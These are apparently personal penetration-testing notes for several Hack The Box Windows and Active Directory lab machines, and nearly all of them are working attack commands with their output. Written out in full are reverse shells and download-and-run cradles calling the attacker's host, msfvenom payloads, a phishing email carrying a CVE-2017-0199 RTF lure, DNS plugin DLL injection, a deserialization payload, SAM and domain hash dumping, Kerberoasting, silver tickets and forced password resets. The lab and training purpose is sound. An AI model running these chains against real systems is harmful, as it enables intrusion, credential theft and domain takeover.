Failed(Kerberoast_password_non-crackable)
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/0xDF'}
*Evil-WinRM* PS C:\programdata> setspn -a MSSQLSvc/object.local:1433 object.local\maria
*Evil-WinRM* PS C:\programdata> Get-DomainUser maria | Select serviceprincipalname
for some reason we can't act as smith unless using a credential object
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $pass)
*Evil-WinRM* PS C:\programdata> Get-DomainSPNTicket -SPN "MSSQLSvc/object.local:1433" -Credential $Cred
Hash : $krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQLSvc/object.local...
Failed(try_change_pass)
*Evil-WinRM* PS C:\programdata> $newpass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity maria -AccountPassword $newpass
Success(write Logon_Script)
*Evil-WinRM* PS C:\programdata> echo "whoami /all > \programdata\cmd.out" > cmd.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="c:\\programdata\\cmd.ps1"}
*Evil-WinRM* PS C:\programdata> type \programdata\cmd.out
*Evil-WinRM* PS C:\programdata> echo "dir /s \users\maria\ > \programdata\out" > cmd.ps1
found \users\maria\desktop\Engines.xls
*Evil-WinRM* PS C:\programdata> echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1
Engines.xls has 3 maria passwords, `crackmapexec winrm 10.10.11.132 -u maria -p maria-pass` got maria:W3llcr4ft3d_4cls
`evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'`
Privilege_escalation(maria->DomainAdmin)
*Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
*Evil-WinRM* PS C:\programdata> net user maria
need to exit the session and relogin with evil-winrm
*Evil-WinRM* PS C:\programdata> net user maria
maria is in 'Domain Admins'
Initial_Foothold
https://github.com/SafeBreach-Labs/SirepRAT
`pip install -r requirements.txt --default-timeout=1000`
`python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\programdata\nc.exe -uri http://10.10.14.18/nc64.exe'`
`python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\programdata\nc.exe" --args ' -e cmd 10.10.14.18 9001'`
get cred method 1
kali start smbserver `smbserver.py share . -smb2support`
`reg save HKLM\SAM .\sam` `reg save HKLM\SYSTEM .\system`
`copy .\sam \\10.10.14.18\share\sam`
Failed(file too big): `copy .\system \\10.10.14.18\share\system`
`nc -nvlp 9002 > system` watch the file size until it stops growing, because nc won't say when the transfer is complete
`nc.exe 10.10.14.18 9002 < .\system`
`secretsdump.py -system system -sam sam local` got hashes, crack got app:mesh5143
get cred method 2
there is a script constantly resetting the 'Administrators' local group, so do it fast
kali# chisel_1.7.6_linux_amd64 server -p 8000 --reverse
target# chisel.exe client 10.10.14.18:8000 R:445:localhost:445
`net user fakeadmin passw0rd! /add`
`net localgroup administrators /add fakeadmin` same time on target
`secretsdump.py 'fakeadmin:passw0rd!@127.0.0.1'` same time on kali
get cred method 3
PS C:\program files\windowspowershell\modules\packagemanagement> gci -force
found the hidden batch file 'r.bat' which does the reset of 'administrator' and 'app'
it has both cred app:mesh5143 administrator:_1nt3rn37ofTh1nGz
another way to find the r.bat: `wmic process GET Name,ProcessID,CommandLine,ExecutablePath /FORMAT:LIST`
decrypt user.txt
logging in to HTTP 8080 with app:mesh5143 gives a webshell as app; we can use nc to get a reverse shell as app
PS C:\Data\Users\app> (Import-CliXml -Path user.txt).GetNetworkCredential().Password
this way will show the real user flag
decrypt root.txt
C:\Data\Users\app\hardening.txt shows the hints: - changed default administrator password of "p@ssw0rd" - added firewall rules to restrict unnecessary services - removed administrator account from "Ssh Users" group
C:\Data\Users\app\iot-admin.xml which is another powershell cred file
PS C:\Data\Users\app> $cred = Import-CliXml -Path iot-admin.xml
PS C:\Data\Users\app> $cred.GetNetworkCredential() | fl
we get the cred administrator:_1nt3rn37ofTh1nGz, log in to HTTP 8080, then use nc to get a reverse shell as administrator
PS C:\data\users\administrator> (Import-CliXml -Path root.txt).GetNetworkCredential() | fl
this way will show the real root flag
Initial_Foothold
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) https://www.exploit-db.com/exploits/49125
powershell.exe location based on arch and session: https://ss64.com/nt/syntax-64bit.html
`python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"`
`python3 49125.py 10.10.10.8 80 "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.14.12 9001"`
Privilege_escalation(kostas->system)
`windows-exploit-suggester.py -d 2023-09-04-mssb.xls -i systeminfo.txt` found MS16-032; winpeas also found 'https://www.exploit-db.com/download/39719' in 'IE history'
`IEX (new-object net.webclient).downloadstring("http://10.10.14.12/39719.ps1")`
`Invoke-MS16-032 -command "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.14.12 9002"`
Initial_Foothold
ftp anonymous login found 'AppLocker.docx' 'readme.txt' 'Windows Event Forwarding.docx'
readme.txt got hint: "please email me any rtf format procedures - I’ll review and convert."
`exiftool Windows\ Event\ Forwarding.docx` found 'Creator : nico@megabank.com'
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f hta-psh -o 443.hta`
`git clone https://github.com/bhdresh/CVE-2017-0199`
`python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w 443.rtf -u http://10.10.14.2/443.hta -x 0`
`sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a 443.rtf -s 10.10.10.77 -v`
OR use msf exploit/windows/fileformat/office_word_hta
`sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/invoice.doc -s 10.10.10.77 -v`
Privilege_escalation(nico->tom)
found powershell cred file C:\Users\nico\Desktop\cred.xml
`powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"`
output Tom:1ts-mag1c!!!, with which we can ssh into the target
Privilege_escalation(tom->claire)
C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors\acls.csv open and analyze OR upload it to bloodhound
OR `bloodhound-python -u Tom -p '1ts-mag1c!!!' -d HTB.LOCAL -c all -dc 10.10.10.77 --zip`
Both Failed(upload fails, bloodhound-python times out) so we have to manually analyze 'acls.csv'
'tom' has 'WriteOwner' over 'claire' which has 'WriteDacl' over 'Backup_Admins' group
PS C:\Users\tom\Desktop\AD Audit\BloodHound> . .\PowerView.ps1
PS C:\users\tom\desktop\AD Audit\BloodHound> Set-DomainObjectOwner -identity claire -OwnerIdentity tom
PS C:\users\tom\desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
PS C:\users\tom\desktop\AD Audit\BloodHound> $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
PS C:\users\tom\desktop\AD Audit\BloodHound> Set-DomainUserPassword -identity claire -accountpassword $cred
`ssh claire@10.10.10.77` with 'qwer1234QWER!@#$'
Privilege_escalation(claire->Backup_Admins)
claire@REEL C:\Users\claire>net group backup_admins claire /add
claire@REEL C:\Users\Administrator>net group backup_admins
verify 'claire' is in the group
Privilege_escalation(Backup_Admins->Administrator)
C:\Users\Administrator\Desktop\Backup Scripts\BackupScript.ps1 found cred 'Cr4ckMeIfYouC4n!' and comment '# admin password'
`ssh administrator@10.10.10.77` with 'Cr4ckMeIfYouC4n!'
Initial_Foothold
found '2049/tcp open nfs'
`showmount -e 10.10.10.180` shows '/site_backups (everyone)'
`mount -t nfs 10.10.10.180:/site_backups /mnt/` OR `mount --types nfs --target /mnt/ 10.10.10.180:/site_backups`
`strings /mnt/App_Data/Umbraco.sdf | head` found 'admin@htb.local' hash: b8be16afba8c314ad33d812f22a04991b90e2aaa and crack got 'baconandcheese'
gobuster and the /mnt both found /umbraco
login with admin@htb.local:baconandcheese
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) https://www.exploit-db.com/exploits/49488
`python3 49488.py -i http://10.10.10.180 -u "admin@htb.local" -p baconandcheese -c whoami`
`python3 49488.py -i http://10.10.10.180 -u "admin@htb.local" -p baconandcheese -c whoami -a " /all"`
`python3 49488.py -i http://10.10.10.180 -u "admin@htb.local" -p baconandcheese -c powershell.exe -a " IEX (new-object net.webclient).downloadstring('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"`
Privilege_escalation(iis apppool\defaultapppool->administrator)
PS> `cd HKLM:\software\WOW6432Node\TeamViewer` and `dir` OR `get-itemproperty -path .` found 'SecurityPasswordAES : {255, 155, 28, 115...}'
PS HKLM:\software\WOW6432Node\TeamViewer\Version7> (get-itemproperty -path .).SecurityPasswordAES
We can use 0xdf's decrypt script: https://0xdf.gitlab.io/2020/09/05/htb-remote.html#decrypt-password
`python3 0xdf_AES128CBC_decode.py` [+] Found password: !R3m0te!
OR follow ippsec: get a meterpreter session in msf and use windows/gather/credentials/teamviewer_passwords
msf6 post(windows/gather/credentials/teamviewer_passwords) > set session 8
msf6 post(windows/gather/credentials/teamviewer_passwords) > run
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
`psexec.py administrator@10.10.10.180` with !R3m0te!
Initial_Foothold
`rpcclient -U "" -N 10.10.10.169` `enumdomusers` save usernames
`querydispinfo` found cred marko:Welcome123!
`crackmapexec winrm 10.10.10.169 -u rpc_users.txt -p 'Welcome123!'` found melanie:Welcome123!
`evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'`
Privilege_escalation(melanie–>ryan)
C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt found cred ryan:Serv3r4Admin4cc123!
`evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'`
note: 'ryan' is not in 'Remote Management Users' but in 'Contractors', which is a nested group of 'Remote Management Users'
Privilege_escalation(ryan–>SYSTEM)
'ryan' is in 'MEGABANK\DnsAdmins' https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#dnsadmins
"The default permissions are Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions."
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -f dll -o rev.dll`
`smbserver.py s .`
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.14.11\s\rev.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns
`rlwrap nc -lnvp 443` and we got a system shell
Initial_Foothold
nmap found the domain 'EGOTISTICAL-BANK.LOCAL'; SMB anonymous login works but lists no shares
`kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175` found the username 'fsmith', whose format points to 'Fergus Smith' on the /about.html page; save all usernames from that page in the same format
`GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175`
`hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force` got cred fsmith:Thestrokes23
`evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23`
Privilege_escalation(fsmith–>svc_loanmgr)
winpeas found autologin cred EGOTISTICALBANK\svc_loanmanager:Moneymakestheworldgoround!
manually discover the cred: *Evil-WinRM* PS HKLM:\software\microsoft\windows nt\currentversion\winlogon> get-item -path .
`evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'`
Privilege_escalation(svc_loanmgr–>administrator)
`bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all --zip`
'svc_loanmgr' has 1 'First Degree Object Control' which includes 'GetChanges' and 'GetChangesAll' over the 'EGOTISTICAL-BANK.LOCAL' domain
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'` got administrator's NT hash
`wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175`
OR `evil-winrm -i 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e`
Initial_Foothold
enumerate the website: /supportrequest.html shows the username 'ksimpson' in a cmd screenshot, and /passwords.html says passwords are "reset your password to be the same as the username"
`smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local` `help` `shares` `use public` `get Network Security Changes.pdf`
'Network Security Changes.pdf' says "NTLM is disabled" "now everything is done via Kerberos" "SQL database has had access removed from the HR department"
Failed: `GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k -debug`
note: if NTLM is disabled, GetUserSPNs.py needs a fix: https://github.com/fortra/impacket/issues/1206
Use the -dc-ip option but specify the fully qualified domain name of a DC rather than the IP; line 260: use 'target = self.__kdcHost' instead of 'target = self.getMachineName()'
`GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -request -k`
`hashcat mssqlsvc-hash /usr/share/wordlists/rockyou.txt` got cred sqlsvc:Pegasus60
generate the NT (NTLM) hash of the password: `iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4` b999a16500b87d17ec7f2e2a68778f05
get SSL/TLS certificate: `openssl s_client -connect dc1.scrm.local:636` save as 'ldapserver.pem'
edit 'TLS_CACERT' in '/etc/ldap/ldap.conf' point to the full path of 'ldapserver.pem'
dump all users: `ldapsearch -h dc1.scrm.local -Z -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)"` the entries carry a base64 objectSid, e.g. objectSid:: AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
get SID: `getPac.py -targetUser administrator scrm.local/ksimpson:ksimpson` OR use 0xdf's sid.py script on the objectSid value from ldapsearch; SID: S-1-5-21-2743207045-1827831105-2542523200
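0xdf's sid.py does the conversion mentioned above; the following is an added Python equivalent (not from the notes, not from impacket) that decodes the base64 objectSid shown in the ldapsearch output into its S-1-5-... form and splits off the RID, so the domain SID needed later can be read straight from the LDAP dump. The constant below is the value from the ldapsearch line above.

```python
import base64
import struct

# The objectSid value as returned by ldapsearch above (base64 of the binary SID).
LDAP_OBJECTSID_B64 = "AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA=="


def sid_bytes_to_string(raw: bytes) -> str:
    """Convert a binary Windows SID (MS-DTYP 2.4.2.2) to its S-1-... string form.

    Layout: Revision (1 byte), SubAuthorityCount (1 byte),
    IdentifierAuthority (6 bytes, big-endian), then SubAuthorityCount
    little-endian 32-bit sub-authorities.
    """
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{count}I", raw[8:])
    return "S-%d-%d" % (revision, authority) + "".join(f"-{s}" for s in subs)


def parse_ldap_objectsid(b64: str) -> dict:
    """Decode an LDAP objectSid attribute and split it into domain SID and RID.

    The domain SID is everything before the last sub-authority; the last
    sub-authority is the RID (500 is the built-in Administrator account).
    """
    sid = sid_bytes_to_string(base64.b64decode(b64))
    domain_sid, _, rid = sid.rpartition("-")
    return {"sid": sid, "domain_sid": domain_sid, "rid": int(rid)}


if __name__ == "__main__":
    print(parse_ldap_objectsid(LDAP_OBJECTSID_B64))
```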
get a silver ticket: `ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator` [*] Saving ticket in administrator.ccache
note: On Linux, Kerberos looks in predefined places for tickets, like /tmp/krb5cc_[uid of current user] and any file pointed to by the KRB5CCNAME environment variable
`cp administrator.ccache /tmp/krb5cc_0` OR `export KRB5CCNAME=administrator.ccache` and verify in the end with `klist`
`mssqlclient.py -k dc1.scrm.local` `select name, database_id from sys.databases;` `SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;`
`SELECT * from ScrambleHR.dbo.UserImport;` got cred MiscSvc:ScrambledEggs9900 scrm.local
/etc/krb5.conf:
[libdefaults]
default_realm = SCRM.LOCAL
[realms]
SCRM.LOCAL = {
kdc = dc1.scrm.local
admin_server = dc1.scrm.local
}
note: we cannot use `evil-winrm` because NTLM is disabled, but we can use `pwsh`
`sudo pwsh` `update-help` `Install-Module -Name PSWSMan -Scope AllUsers` Yes_to_All `Install-WSMan` `exit`
restart pwsh `sudo pwsh` `Enter-PSSession dc1.scrm.local -Credential MiscSvc` enter password: ScrambledEggs9900
get a proper shell `iwr 10.10.14.6/nc64.exe -outfile nc64.exe` `rlwrap -cAr nc -lnvp 443`
Privilege_escalation 1(MiscSvc->system)
......the process of identifying the .NET object deserialization and exploiting it is way out of my experience, but I'll sum it up down here
in 'C:\shares\IT\Apps\Sales Order Client\' found and downloaded 'ScrambleClient.exe' and 'ScrambleLib.dll'
run it on Windows and follow the webpage's steps to connect to the target (need to edit C:\Windows\System32\drivers\etc\hosts, just like /etc/hosts)
after logging in to the app, "Tools" > "Enable Debug Logging", then update a new order to trigger traffic; 'ScrambleDebugLog.txt' appears in the same directory as the exe (Wireshark also works)
analyzing the log shows 'Deserialization'; analyze ScrambleClient.exe with dnSpy.exe on Windows
.NET object deserialization https://github.com/pwntester/ysoserial.net
PS > .\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"
set up the listener, then `nc 10.10.11.168 4411` and send the payload below to get a system shell
UPLOAD_ORDER;<base64 ysoserial payload, elided>
Privilege_escalation 2(MiscSvc->system)
enable xp_cmdshell in SQL first
SQL> EXECUTE sp_configure 'show advanced options', 1
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
SQL> RECONFIGURE
SQL> xp_cmdshell whoami /all
'SeImpersonatePrivilege Enabled'
SQL> xp_cmdshell powershell curl 10.10.14.6/nc64.exe -outfile C:\\programdata\\nc64.exe
SQL> xp_cmdshell powershell curl 10.10.14.6/rev.bat -outfile C:\\programdata\\rev.bat
rev.bat content: C:\\programdata\\nc64.exe -e cmd 10.10.14.6 443
SQL> xp_cmdshell powershell curl 10.10.14.6/JuicyPotatoNG.exe -outfile C:\\programdata\\jp.exe
RoguePotato also works
`rlwrap -cAr nc -lvnp 443`
SQL> xp_cmdshell C:\\programdata\\jp.exe -t * -p C:\\programdata\\rev.bat
and we got a system shell
Unintended File Read Via MSSQL
SQL> SELECT BulkColumn FROM OPENROWSET(BULK 'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) MyFile
Initial_Foothold
the TLS cert reveals 'research.search.htb', and zooming into a page image shows "Send password to Hope Sharp" "IsolationIsKey?"
create userlist file hope.txt and fill with 'hope sharp h.sharp hope.s hope.sharp hopesharp' one per line
`crackmapexec smb 10.10.11.129 -u hope.txt -p IsolationIsKey? --continue-on-success` found hope.sharp:IsolationIsKey?
`smbmap -u hope.sharp -p IsolationIsKey? -R -H 10.10.11.129 --no-banner` /RedirectedFolders$ lists many usernames as folder names
`ldapsearch -h 10.10.11.129 -x -s base namingcontexts` `ldapsearch -h 10.10.11.129 -x -b "DC=search,DC=htb"`
`ldapsearch -h 10.10.11.129 -D 'hope.sharp@search.htb' -w "IsolationIsKey?" -b "DC=search,DC=htb"`
my Kali can't run -h, so: `ldapsearch -H ldap://10.10.11.129 -x -D 'hope.sharp@search.htb' -w "IsolationIsKey?" -b "DC=search,DC=htb" > ldapsearch.txt`
`ldapdomaindump -u search.htb\\hope.sharp -p 'IsolationIsKey?' 10.10.11.129 -o ldap/` output html, looks good
`bloodhound-python -u hope.sharp -p IsolationIsKey? -d search.htb -c All -ns 10.10.11.129 --zip`
in bloodhound, "List all Kerberoastable Accounts" shows WEB_SVC and KRBTGT
`GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/hope.sharp -outputfile web_svc.hash` enter password: IsolationIsKey?
`hashcat web_svc.hash /usr/share/wordlists/rockyou.txt` got cred web_svc:@3ONEmillionbaby but it does not really help
`cat bloodhound/20230906054646_users_multi_lines.json | jq -r '.data[].Properties.samaccountname' > users.txt`
`crackmapexec smb 10.10.11.129 -u users.txt -p passwords.txt --continue-on-success` found Edgar.Jacobs:@3ONEmillionbaby
`smbmap -u edgar.jacobs -p '@3ONEmillionbaby' -H 10.10.11.129 -s helpdesk -R` found \edgar.jacobs\Desktop\Phishing_Attempt.xlsx
`smbclient //10.10.11.129/RedirectedFolders$ '@3ONEmillionbaby' -U edgar.jacobs` smb: \edgar.jacobs\> get Desktop\Phishing_Attempt.xlsx
in the xlsx file, column C is hidden
0xdf: https://yodalearning.com/tutorials/unprotect-excel/
ippsec: http://www.excelsupersite.com/how-to-remove-an-excel-spreadsheet-password-in-6-easy-steps/
follow the steps on the webpage: mkdir, then `unzip Phishing_Attempt.xlsx` `sed -i 's/<sheetProtection[^>]*>//' xl/worksheets/sheet2.xml` `zip -fr Phishing_Attempt.xlsx *`
open it again and column C shows the passwords; save the users and passwords into files
`crackmapexec smb 10.10.11.129 -u Phishing_Attempt_users.txt -p Phishing_Attempt_passwords.txt --no-bruteforce --continue-on-success` found Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
`smbclient //10.10.11.129/RedirectedFolders$ '$$49=wide=STRAIGHT=jordan=28$$18' -U sierra.frye`
smb: \> get sierra.frye\Desktop\user.txt
Privilege_escalation()
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
tried to import them into the browser, but they need a password.
`/usr/share/john/pfx2john.py search-RESEARCH-CA.p12 > search-RESEARCH-CA.p12.hash` `john --wordlist=/usr/share/wordlists/rockyou.txt search-RESEARCH-CA.p12.hash` got cred: misspissy
`/usr/share/john/pfx2john.py staff.pfx > staff.pfx.hash` `john --wordlist=/usr/share/wordlists/rockyou.txt staff.pfx.hash` got cred: misspissy
gobuster dir https://search.htb found /staff is 403, but after importing the certs it is a 'Windows PowerShell Web Access'
login with Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 computer_name: research
in bloodhound, "Shortest Paths to Domain Admins from Owned Principals"
user 'Sierra.Frye' is in 'BIRMINGHAM-ITSEC' group, which is in 'ITSEC' group, which has 'ReadGMSAPassword' over user 'BIR-ADFS-GMSA', which has 'GenericAll' over user 'Tristan.Davies', which is in 'Domain Admins' group
I have not tried this: https://github.com/rvazarkar/GMSAPasswordReader
0xdf & ippsec both use this: https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> ConvertFrom-ADManagedPasswordBlob $mp
"CurrentPassword field looks like gibberish, but that’s the point of having a GMSA"
PS C:\Users\Sierra.Frye\Documents> (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
check that it works, then store it in $password and also $SecPass
PS C:\Users\Sierra.Frye\Documents> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
PS C:\Users\Sierra.Frye\Documents> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
with the 'BIR-ADFS-GMSA' cred stored in $SecPass, we can overwrite 'Tristan.Davies' password
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA, $SecPass
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity tristan.davies -reset -NewPassword (ConvertTo-SecureString -AsPlainText '0xdf0xdf!!!' -force)} -Credential $cred
`wmiexec.py 'search/tristan.davies:0xdf0xdf!!!@10.10.11.129'` now `whoami /all` we have 'domain admins' group membership
Initial_Foothold
tcp/80: register and log in
found /change_pass.php accepts a GET request and doesn't require the old password
found /contact.php leaks the username tyler, and if we submit the URL of a Python HTTP server on Kali, it gets hit, which means the user (a script) clicks the link
XSRF (Cross-Site Request Forgery), aka "one-click attack" and "session riding"; it is easily defeated by including POST parameters such as a token in the form that generates the request, which would not be replicated in the link passed to the target.
use Burp to intercept our own /change_pass.php GET request, then submit this URL: http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit
now we can log in as tyler:password, OR just register as [' or 1='1]
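The defence described above (a session-bound token in a POST form, plus requiring the old password), as an added Python illustration that is not the site's PHP code: a handler with the same weaknesses as /change_pass.php next to a hardened one. The in-memory user table, the function names and the response strings are constructed for this example.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory user table standing in for the site's database:
# username -> (salt, pbkdf2 hash). Passwords are never kept in clear.
USERS = {}


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def set_password(user, password):
    salt = secrets.token_bytes(16)
    USERS[user] = (salt, _hash(password, salt))


def check_password(user, password):
    salt, stored = USERS[user]
    return hmac.compare_digest(_hash(password, salt), stored)


def vulnerable_change_pass(method, params, session):
    """Mirrors the weak handler: any HTTP method, no old password, no CSRF token.
    A link such as /change_pass.php?password=x&confirm_password=x is enough,
    so anyone who can make the victim's browser follow a URL resets it."""
    if params.get("password") != params.get("confirm_password"):
        return "400 passwords do not match"
    set_password(session["user"], params["password"])
    return "changed"


def issue_csrf_token(session):
    """Per-session random token; the server embeds it in the form and checks it on submit.
    A link handed to the victim cannot contain it, which is the point made above."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def hardened_change_pass(method, params, session):
    """State-changing request: POST only, session-bound CSRF token, old password required."""
    if method != "POST":
        return "405 method not allowed"
    sent = params.get("csrf_token", "")
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(sent.encode(), expected.encode()):
        return "403 bad csrf token"
    user = session["user"]
    if not check_password(user, params.get("old_password", "")):
        return "403 wrong old password"
    if params.get("password") != params.get("confirm_password"):
        return "400 passwords do not match"
    set_password(user, params["password"])
    issue_csrf_token(session)  # rotate the token so a captured form cannot be replayed
    return "changed"


# Constructed starting state: the victim account with an unknown password.
set_password("tyler", "OldPass1!")
```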
after logging in as tyler or [' or 1='1] we found: \secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*&
`smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site` found iisstart.htm which seems to be the webroot of 8808/tcp
`put /opt/shells/php/cmd.php 0xdf.php` `put /opt/shells/netcat/nc.exe nc.exe`
`curl "http://10.10.10.97:8808/0xdf.php?cmd=nc.exe+-e+cmd.exe+10.10.14.15+443"`
Privilege_escalation(tyler->administrator)
found C:\Users\tyler\Desktop\bash.lnk, which proves there is a bash.exe
`where /R c:\ bash.exe` output: c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
running it enters a Linux container, and its '.bash_history' is not empty
root@SECNOTES:~# cat .bash_history
found 'smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$'
`winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe` OR `psexec.py administrator@10.10.10.97`
Initial_Foothold
ftp anonymous login found /Users/Nadine/Confidential.txt, which has a hint: user 'Nathan' has placed 'Passwords.txt' on the Desktop of user 'Nadine'
tcp/80 redirects to /Pages/login.htm, which looks like the NVMS-1000 login form
`searchsploit "nvms 1000"` found 'NVMS 1000 - Directory Traversal' https://www.exploit-db.com/exploits/47774
GET /../../../../../../../../../../../../windows/win.ini as a test works
GET /../../../../../../../../../../../../users/nathan/desktop/passwords.txt and save the contents to a file, plus the 2 users we know to another
`crackmapexec smb 10.10.10.184 -u users -p passwords` found cred nadine:L1k3B1gBut7s@W0rk
`ssh nadine@10.10.10.184` with L1k3B1gBut7s@W0rk
Privilege_escalation(nadine–>SYSTEM)
NSClient++ 0.5.2.35 - Privilege Escalation https://www.exploit-db.com/exploits/46802
find the NSClient++ password ew2x6SsGTxjRwXOT with c:\Program Files\NSClient++>type nsclient.ini OR C:\Program Files\NSClient++>nscp web -- password --display
but we can't log in to tcp/8443 with it from outside, because 'allowed hosts = 127.0.0.1' in nsclient.ini
`ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443` now we can login https://127.0.0.1:8443/
